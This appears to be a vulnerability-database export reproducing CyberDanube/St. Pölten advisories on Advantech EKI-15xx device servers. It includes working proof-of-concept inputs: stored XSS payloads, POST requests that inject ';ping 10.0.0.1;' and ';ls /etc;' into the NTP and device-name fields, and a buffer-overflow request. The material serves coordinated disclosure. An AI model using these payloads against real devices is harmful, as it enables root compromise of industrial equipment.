"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "office@cyberdanube.com",
"availabilityImpact": "HIGH",
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-4202",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "office@cyberdanube.com",
"id": "CVE-2023-4202",
"trust": 1.0,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4202"
},
{
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the device name field of the web-interface. St. P\\xf6lten UAS\n-------------------------------------------------------------------------------\n title| Multiple XSS in Advantech\n product| Advantech EKI-1524-CE series, EKI-1522 series,\n | EKI-1521 series\n vulnerable version| \u003c=1.21 (CVE-2023-4202), \u003c=1.24 (CVE-2023-4203)\n fixed version| 1.26\n CVE number| CVE-2023-4202, CVE-2023-4203\n impact| Medium\n homepage| https://advantech.com\n found| 2023-05-04\n by| R. Haas, A. Resanovic, T. Etzenberger, M. Bineder\n | This vulnerability was discovery during research at\n | St. P\\xf6lten UAS, supported and coordinated by CyberDanube. \n |\n | https://fhstp.ac.at | https://cyberdanube.com\n-------------------------------------------------------------------------------\n\nVendor description\n-------------------------------------------------------------------------------\n\\x93Advantech\\x92s corporate vision is to enable an intelligent planet. The company\nis a global leader in the fields of IoT intelligent systems and embedded\nplatforms. To embrace the trends of IoT, big data, and artificial intelligence,\nAdvantech promotes IoT hardware and software solutions with the Edge\nIntelligence WISE-PaaS core to assist business partners and clients in\nconnecting their industrial chains. Advantech is also working with business\npartners to co-create business ecosystems that accelerate the goal of\nindustrial intelligence.\\x94\n\nSource: https://www.advantech.com/en/about\n\n\nVulnerable versions\n-------------------------------------------------------------------------------\nEKI-1524-CE series / 1.21 (CVE-2023-4202)\nEKI-1522-CE series / 1.21 (CVE-2023-4202)\nEKI-1521-CE series / 1.21 (CVE-2023-4202)\n\nEKI-1524-CE series / 1.24 (CVE-2023-4203)\nEKI-1522-CE series / 1.24 (CVE-2023-4203)\nEKI-1521-CE series / 1.24 (CVE-2023-4203)\n\n\nVulnerability overview\n-------------------------------------------------------------------------------\n1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)\nTwo stored cross-site scripting vulnerabilities has been identified in the\nfirmware of the device. The first XSS was identified in the \"Device Name\" field\nand the second XSS was found in the \"Ping\" tool. This can be exploited in the\ncontext of a victim\u0027s session. \n\n1.1) Stored XSS in Device Name CVE-2023-4202\nThe first vulnerability can be triggerd by setting the device name\n(\"System-\u003eDevice Name\") to the following value:\n\"\u003e\u003cscript\u003ealert(\"document.cookie\")\u003c/script\u003e\n\nThis code prints out the cached cookies to the screen. \n\n1.2) Stored XSS in Ping Function CVE-2023-4203\nThe second XSS vulnerability can be found in \"Tools-\u003ePing\". The following GET\nrequest prints the current cached cookies of a user\u0027s session to the screen. \n\nhttp://$IP/cgi-bin/ping.sh?random_num=2013\u0026ip=172.16.0.141%3b%20\u003cscript\u003ealert(1)\u003c/script\u003e\u0026size=56\u0026count=1\u0026interface=eth0\u0026_=1682793104513\n\nAn alternative to the used payload is using \"onmouseover\" event tags. In this\ncase it prints out the number \"1337\":\n\" onmousemove=\"alert(1337)\"\n\nThe vulnerability was manually verified on an emulated device by using the\nMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). \n\n\nSolution\n-------------------------------------------------------------------------------\nUpgrade to the newest available firmware. \n\nWorkaround\n-------------------------------------------------------------------------------\nNone. \n\n\nRecommendation\n-------------------------------------------------------------------------------\nAdvantech customers are advised to upgrade the firware to the latest\navailable version. \n\n\nContact Timeline\n-------------------------------------------------------------------------------\n2023-05-16: Contacting vendor via security contact. \n2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21. \n The contact is trying to reproduce issue 1.2; Gave advice to\n reproduce issue. \n2023-05-25: Contact stated that new firmware should resolve the issue. \n2023-06-03: Sent new payload to the vendor. \n2023-06-05: Vendor asked for clarification; Sent further explaination to the\n contact; Vendor contact said he knows a solution. \n2023-06-22: Asked for an update; Contact stated that the beta firmware should\n resolve the issues. \n2023-06-27: Asked for the release date. \n2023-07-04: Contact stated, that they are currently doing QA tests. \n2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated\n that it can be published. \n2023-07-17: Assigned CVE numbers for the issues. Asked for an update. \n2023-07-18: Vendor contact stated that the firmware will be released end of\n July. \n2023-08-07: Asked contact for the new firmware version. \n2023-08-08: Received version 1.26 as the official released firmware with fixes. \n Coordinated release of security advisory. \n\n\n\nWeb: https://www.fhstp.ac.at/\nTwitter: https://twitter.com/fh_stpoelten\nMail: mis at fhstp dot ac dot at\n\nEOF T. Weber / @2023\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4202"
},
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-4202",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "174153",
"trust": 1.1
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
},
{
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"id": "VAR-202308-2104",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2023-12-18T13:41:18.264000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/174153/advantech-eki-1524-ce-eki-1522-eki-1521-cross-site-scripting.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2023/aug/13"
},
{
"trust": 1.0,
"url": "https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"trust": 0.1,
"url": "https://fhstp.ac.at"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-4203"
},
{
"trust": 0.1,
"url": "http://$ip/cgi-bin/ping.sh?random_num=2013\u0026ip=172.16.0.141%3b%20\u003cscript\u003ealert(1)\u003c/script\u003e\u0026size=56\u0026count=1\u0026interface=eth0\u0026_=1682793104513"
},
{
"trust": 0.1,
"url": "https://cyberdanube.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-4202"
},
{
"trust": 0.1,
"url": "https://twitter.com/fh_stpoelten"
},
{
"trust": 0.1,
"url": "https://www.advantech.com/en/about"
},
{
"trust": 0.1,
"url": "https://advantech.com"
},
{
"trust": 0.1,
"url": "https://medusa.cyberdanube.com)."
},
{
"trust": 0.1,
"url": "https://www.fhstp.ac.at/"
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
},
{
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "174153"
},
{
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-14T17:13:30",
"db": "PACKETSTORM",
"id": "174153"
},
{
"date": "2023-08-08T11:15:11.980000",
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-14T19:15:14.220000",
"db": "NVD",
"id": "CVE-2023-4202"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524-CE / EKI-1522 / EKI-1521 Cross Site Scripting",
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.1
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "174153"
}
],
"trust": 0.1
}
}
var-202305-0371
Vulnerability from variot
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0
title| Multiple Vulnerabilities
product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series
vulnerable version| 1.21 fixed version| 1.24 CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575 impact| High homepage| https://advantech.com found| 2023-03-06 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. P\xf6lten | | https://www.cyberdanube.com
Vendor description
"Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence."
Source: https://www.advantech.com/en/about
Vulnerable versions
EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21
Vulnerability overview
1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background:
1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
=============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94.
1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574) The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
=============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94.
2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
The serial port of the device provides error messages, which already indicate
that the stack has been corrupted:
/ # *** Error in ./index.cgi': free(): invalid next size (normal): 0x00069828 ***
*** Error in./index.cgi': malloc(): memory corruption: 0x00069898 ***
Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...]
The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Solution
Update the product to the latest available firmware version.
Workaround
None
Recommendation
CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.
Contact Timeline
2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory.
Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com
EOF S. Dietz, T. Weber / @2023
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202305-0371",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "eki-1524",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1521",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1522",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1521",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "eki-1522",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "eki-1524",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"db": "NVD",
"id": "CVE-2023-2573"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-2573"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Weber",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
],
"trust": 0.6
},
"cve": "CVE-2023-2573",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-2573",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-2573",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "office@cyberdanube.com",
"id": "CVE-2023-2573",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202305-383",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0\n-------------------------------------------------------------------------------\n title| Multiple Vulnerabilities\n product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series\n vulnerable version| 1.21\n fixed version| 1.24\n CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575\n impact| High\n homepage| https://advantech.com\n found| 2023-03-06\n by| S. Dietz, T. Weber (Office Vienna)\n | CyberDanube Security Research\n | Vienna | St. P\\xf6lten\n |\n | https://www.cyberdanube.com\n-------------------------------------------------------------------------------\n\nVendor description\n-------------------------------------------------------------------------------\n\"Advantech\\x92s corporate vision is to enable an intelligent planet. The company\nis a global leader in the fields of IoT intelligent systems and embedded\nplatforms. To embrace the trends of IoT, big data, and artificial intelligence,\nAdvantech promotes IoT hardware and software solutions with the Edge\nIntelligence WISE-PaaS core to assist business partners and clients in\nconnecting their industrial chains. Advantech is also working with business\npartners to co-create business ecosystems that accelerate the goal of\nindustrial intelligence.\"\n\nSource: https://www.advantech.com/en/about\n\n\nVulnerable versions\n-------------------------------------------------------------------------------\nEKI-1524-CE series / 1.21\nEKI-1522-CE series / 1.21\nEKI-1521-CE series / 1.21\n\nVulnerability overview\n-------------------------------------------------------------------------------\n1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)\nThe web server of the device is prone to two authenticated command injections. \nThese allow an attacker to gain full access to the underlying operating system\nof the device. This device class can be attached to legacy systems via RS-232,\nRS-422 or RS-485. Such peripheral systems can be affected by attacks to the\ndevice from malicious actors. According to the vendor, the NTP\nserver string is expected to be 64 bytes long, which is not correctly checked. The following proof-of-concepts show how to inject commands to the\nsystem which gets executed with root permissions in the background:\n\n1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)\nThe following POST request executes the command \\x93;ping 10.0.0.1\\x94 on the system:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=;ping+10.0.0.1;\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nIt is also possible to execute this command without any interceptor proxy 